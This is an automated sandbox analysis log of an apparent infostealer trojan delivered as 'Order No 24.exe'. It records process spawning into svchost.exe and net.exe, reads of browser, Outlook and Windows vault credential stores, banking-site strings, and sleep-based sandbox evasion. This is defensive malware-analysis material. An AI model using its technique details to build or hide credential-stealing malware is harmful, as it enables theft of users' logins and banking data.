                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 102 times
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: String function: 009AF8A0 appears 35 times
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: String function: 0099EC2F appears 68 times
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: String function: 009A6AC0 appears 42 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F55130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F0B970 appears 280 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F8EA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F67E54 appears 102 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F9F290 appears 105 times
                Source: Order No 24.exe, 00000000.00000003.2138051965.0000000003B9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order No 24.exe
                Source: Order No 24.exe, 00000000.00000003.2135410493.00000000039F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order No 24.exe
                Source: Order No 24.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/9
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CCE7A GetLastError,FormatMessageW,0_2_009CCE7A
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009BAB84 AdjustTokenPrivileges,CloseHandle,0_2_009BAB84
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009BB134
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009CE1FD
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_009C6532
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_009DC18C
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0098406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0098406B
                Source: C:\Users\user\Desktop\Order No 24.exeFile created: C:\Users\user\AppData\Local\Temp\autC4A8.tmpJump to behavior
                Source: Order No 24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: net.exe, 00000004.00000002.4576398296.00000000029DC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2495423301.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4576398296.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4576398296.00000000029D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Order No 24.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\Order No 24.exe "C:\Users\user\Desktop\Order No 24.exe"
                Source: C:\Users\user\Desktop\Order No 24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order No 24.exe"
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Order No 24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order No 24.exe"Jump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Order No 24.exeStatic file information: File size 1218048 > 1048576
                Source: Order No 24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Order No 24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Order No 24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Order No 24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Order No 24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Order No 24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Order No 24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2268680902.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2268784841.000000000083B000.00000004.00000020.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000002.4576582930.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vqiDHNHvZuv.exe, 00000003.00000000.2190711391.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4576813275.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: Order No 24.exe, 00000000.00000003.2139513122.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Order No 24.exe, 00000000.00000003.2129931817.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2176578979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2174584549.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2301147253.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.000000000307E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2308281410.0000000002D3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Order No 24.exe, 00000000.00000003.2139513122.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Order No 24.exe, 00000000.00000003.2129931817.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2301205113.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2176578979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2174584549.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000003.2301147253.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.000000000307E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2308281410.0000000002D3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.000000000350C000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000000.2377314879.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2604417114.000000002CC4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.000000000350C000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000000.2377314879.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2604417114.000000002CC4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2268680902.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2268784841.000000000083B000.00000004.00000020.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000002.4576582930.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
                Source: Order No 24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Order No 24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Order No 24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Order No 24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Order No 24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0099E01E LoadLibraryA,GetProcAddress,0_2_0099E01E
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009A6B05 push ecx; ret 0_2_009A6B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00491ACE push eax; iretd 2_2_00491B68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004961DF push FFFFFF9Bh; retf 2_2_004961E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0049AA1D push edi; retf 2_2_0049AA23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00491B40 push eax; iretd 2_2_00491B68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A933F push ss; ret 2_2_004A9355
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00495BF7 push FFFFFFE2h; iretd 2_2_00495BFD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00494BB6 push ds; iretd 2_2_00494BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00493420 push eax; ret 2_2_00493422
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A3CE3 push es; retf 2_2_004A3D12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A8F53 push esp; ret 2_2_004A9157
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0049AF60 push 0000007Bh; iretd 2_2_0049AF62
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F109AD push ecx; mov dword ptr [esp], ecx4_2_02F109B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003927D4 push FFFFFFE2h; iretd 4_2_003927DA
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A08C0 push es; retf 4_2_003A08EF
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_00392DBC push FFFFFF9Bh; retf 4_2_00392DBE
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003B0E6A push esp; retf 4_2_003B0E6B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003975FA push edi; retf 4_2_00397600
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_00391793 push ds; iretd 4_2_00391795
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003AB83A push esp; iretd 4_2_003AB85B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_00397B3D push 0000007Bh; iretd 4_2_00397B3F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A5B30 push esp; ret 4_2_003A5D34
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A5F1C push ss; ret 4_2_003A5F32
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C74360 push ss; retf 4_2_02C74366
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C85062 push eax; ret 4_2_02C85064
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C75170 push ss; ret 4_2_02C7518C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C75AF0 push ds; ret 4_2_02C75AF1
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C7C967 push edi; retf 4_2_02C7C968
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C75936 push ecx; iretd 4_2_02C7593B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C73CED push ss; retf 4_2_02C73D02
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009E8111
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0099EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0099EB42
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009A123A
                Source: C:\Users\user\Desktop\Order No 24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Order No 24.exeAPI/Special instruction interceptor: Address: 1274B94
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A8F53 rdtsc 2_2_004A8F53
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 632Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 9341Jump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeEvaded block: after key decisiongraph_0-94317
                Source: C:\Users\user\Desktop\Order No 24.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94741
                Source: C:\Users\user\Desktop\Order No 24.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\net.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 2548Thread sleep count: 632 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 2548Thread sleep time: -1264000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 2548Thread sleep count: 9341 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 2548Thread sleep time: -18682000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568Thread sleep time: -85000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568Thread sleep time: -52500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568Thread sleep count: 48 > 30Jump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_009C6CA9
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009C60DD
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009C63F9
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009CEB60
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009CF5FA
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CF56F FindFirstFileW,FindClose,0_2_009CF56F
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1B2F
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1C8A
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009D1F94
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003AC820 FindFirstFileW,FindNextFileW,FindClose,4_2_003AC820
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0099DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0099DDC0
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: F14431U2a.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: F14431U2a.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                Source: F14431U2a.4.drBinary or memory string: discord.comVMware20,11696487552f
                Source: F14431U2a.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,1
                Source: F14431U2a.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: F14431U2a.4.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: F14431U2a.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: vqiDHNHvZuv.exe, 00000007.00000002.4576994187.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: F14431U2a.4.drBinary or memory string: global block list test formVMware20,11696487552
                Source: F14431U2a.4.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.office.comVMware20,11696487552o
                Source: F14431U2a.4.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: F14431U2a.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: F14431U2a.4.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: F14431U2a.4.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
